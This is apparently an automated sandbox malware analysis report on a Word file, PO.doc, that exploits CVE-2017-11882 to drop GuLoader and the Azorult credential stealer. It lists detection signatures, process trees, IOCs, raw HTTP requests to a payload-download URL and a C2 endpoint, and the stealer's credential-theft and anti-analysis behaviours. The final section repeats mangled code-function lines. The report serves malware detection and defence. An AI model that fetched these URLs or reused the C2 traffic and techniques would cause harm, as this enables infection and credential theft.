
Analysis Report PO.doc

Overview

General Information

Sample Name: PO.doc
Analysis ID: 288565
MD5: 508243f1ac9630c24ba2e2075a79dd69
SHA1: 34414b0929b642e7d6ec0503eaa1a39370c011d0
SHA256: 07a7c9a2e1cfa993138d4e7dd1d2cbe608a99b9d701a156182c0ed20dafbffa7
Tags: doc

Detection

Detected: Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 948 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2552 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • kkslhdgju.exe (PID: 2796 cmdline: C:\Users\user\AppData\Roaming\kkslhdgju.exe MD5: B645595EBA2B03EF2208D999C0028F8C)
      • kkslhdgju.exe (PID: 2936 cmdline: C:\Users\user\AppData\Roaming\kkslhdgju.exe MD5: B645595EBA2B03EF2208D999C0028F8C)
  • EQNEDT32.EXE (PID: 2976 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000005.00000002.2114524442.00000000001B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security
00000005.00000003.2114199227.000000001E760000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
Process Memory Space: kkslhdgju.exe PID: 2796 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security
Process Memory Space: kkslhdgju.exe PID: 2796 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\kkslhdgju.exe, CommandLine: C:\Users\user\AppData\Roaming\kkslhdgju.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\kkslhdgju.exe, NewProcessName: C:\Users\user\AppData\Roaming\kkslhdgju.exe, OriginalFileName: C:\Users\user\AppData\Roaming\kkslhdgju.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2552, ProcessCommandLine: C:\Users\user\AppData\Roaming\kkslhdgju.exe, ProcessId: 2796
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 150.95.104.240, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2552, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2552, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exe

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: PO.doc | Avira: detected
Antivirus detection for URL or domain
Source: http://endoc.vn/wp-content/plugins/fire/ojabrocre.exe | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exe | Avira: detection malicious, Label: TR/Injector.wtkyj
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exe | Virustotal: Detection: 51%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exe | ReversingLabs: Detection: 19%
Multi AV Scanner detection for submitted file
Source: PO.doc | Virustotal: Detection: 50%
Source: PO.doc | ReversingLabs: Detection: 41%
Source: 5.0.kkslhdgju.exe.400000.0.unpack | Avira: Label: TR/Injector.wtkyj
Source: 4.0.kkslhdgju.exe.400000.0.unpack | Avira: Label: TR/Injector.wtkyj

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\kkslhdgju.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: global traffic | DNS query: name: endoc.vn
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 150.95.104.240:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 150.95.104.240:80
Source: Traffic | Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 46.4.227.96:80
Source: Traffic | Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 46.4.227.96:80 -> 192.168.2.22:49170
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Tue, 22 Sep 2020 10:30:04 GMT
  Last-Modified: Mon, 21 Sep 2020 23:37:36 GMT
  ETag: "3a0248-c000-5afdb55ddb4a3"
  Content-Length: 49152
  Content-Type: application/x-msdownload
  X-Varnish: 49012746
  Age: 0
  X-Cache: MISS
  Accept-Ranges: bytes
  Connection: keep-alive
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: global traffic | HTTP traffic detected:
  GET /wp-content/plugins/fire/ojabrocre.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: endoc.vn
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /ojbro/PL341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: chieftain-enterprises.com
  Content-Length: 105
  Cache-Control: no-cache
  Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 33 14 8b 30 6d 8b 30 65 8b 30 6c 8b 30 6d 8b 30 63 8b 31 11 8b 30 67 ed 41 70 9d 31 70 9d 30 70 9d 35 11 ef
  Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p30m0e0l0m0c10gAp1p0p5
Source: global traffic | HTTP traffic detected:
  POST /ojbro/PL341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: chieftain-enterprises.com
  Content-Length: 32443
  Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E1A0581A-72A2-4470-89E8-B7D87A58E0E0}.tmp
Source: kkslhdgju.exe, 00000005.00000002.2114859554.00000000005F6000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: kkslhdgju.exe, 00000005.00000002.2114859554.00000000005F6000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: endoc.vn
Source: unknown | HTTP traffic detected:
  POST /ojbro/PL341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: chieftain-enterprises.com
  Content-Length: 105
  Cache-Control: no-cache
  Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 33 14 8b 30 6d 8b 30 65 8b 30 6c 8b 30 6d 8b 30 63 8b 31 11 8b 30 67 ed 41 70 9d 31 70 9d 30 70 9d 35 11 ef
  Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p30m0e0l0m0c10gAp1p0p5
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp, kkslhdgju.exe, 00000005.00000003.2114199227.000000001E760000.00000004.00000001.sdmp | String found in binary or memory: http://chieftain-enterprises.com/ojbro/PL341/index.php
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.micro
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.microt%20IT%20TLS%20CA%202.crl0M
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: kkslhdgju.exe, 00000005.00000002.2115125908.000000000067F000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: kkslhdgju.exe, 00000005.00000002.2115125908.000000000067F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com
Source: kkslhdgju.exe, 00000005.00000002.2115125908.000000000067F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: kkslhdgju.exe, 00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmp | String found in binary or memory: http://templateupdater.dlinkddns.com/dk4o91fjw/tvrdemks.php):
Source: kkslhdgju.exe, 00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmp | String found in binary or memory: http://templateupdater.dlinkddns.com/dk4o91fjw/tvrdemks.php?c=chieftain-enterprise
Source: kkslhdgju.exe, 00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmp | String found in binary or memory: http://templateupdater.dlinkddns.com/dk4o91fjw/tvrdemks.php?c=chieftain-enterprises.com):
Source: kkslhdgju.exe, 00000005.00000003.2112654334.000000001E764000.00000004.00000001.sdmp | String found in binary or memory: http://templateupdater.dlinkddns.com/dk4o91fjw/tvrdemks.php?k):
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: kkslhdgju.exe, 00000004.00000002.2093388494.0000000003127000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mozglue.dll.5.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: kkslhdgju.exe, 00000005.00000003.2104703311.000000001FBC8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://www.mozilla.com0
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: https://gytnga.bl.files.1drv.com/
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp, kkslhdgju.exe, 00000005.00000002.2114923970.0000000000610000.00000004.00000020.sdmp | String found in binary or memory: https://gytnga.bl.files.1drv.com/y4mvmSB058la0fXmt7UEtU3LsS9BuuT7X93p5bs8HfAbCvzcoBitI2YFnSoS9RLTf6X
Source: kkslhdgju.exe, 00000005.00000002.2114835463.00000000005EA000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: kkslhdgju.exe, 00000005.00000002.2114524442.00000000001B0000.00000040.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21174&authkey=AN7jvD4
Source: kkslhdgju.exe, 00000005.00000002.2115006499.0000000000633000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: kkslhdgju.exe, 00000005.00000002.2115125908.000000000067F000.00000004.00000020.sdmp, mozglue.dll.5.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: 72121753112444639744129.tmp.5.dr | String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\kkslhdgju.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ojabrocre[1].exe
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_003139D9 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_0031022A EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_00312E76 NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_0031136D NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_00311481 NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_00310D53 NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_0031214A NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_00313E21 NtResumeThread
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_00311A45 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_003102BD NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 4_2_00313ED2 NtResumeThread
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 5_3_1FA08E24
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 5_3_1FA044DC
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 5_3_1FA0D020
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 5_3_1FA0C794
Source: C:\Users\user\AppData\Roaming\kkslhdgju.exe | Code function: 5_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C7945_3_1FA0C794
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C7945_3_1FA0C794
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C7945_3_1FA0C794
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C7945_3_1FA0C794
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C7945_3_1FA0C794
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C7945_3_1FA0C794
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C7945_3_1FA0C794
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C7945_3_1FA0C794
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C1F65_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C1F65_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C1F65_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C1F65_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C1F65_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C1F65_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C1F65_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA0C1F65_3_1FA0C1F6
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA08E245_3_1FA08E24
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA044DC5_3_1FA044DC
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA108BB5_3_1FA108BB
            Source: C:\Users\user\AppData\Roaming\kkslhdgju.exeCode function: 5_3_1FA108BB5_3_1FA108BB
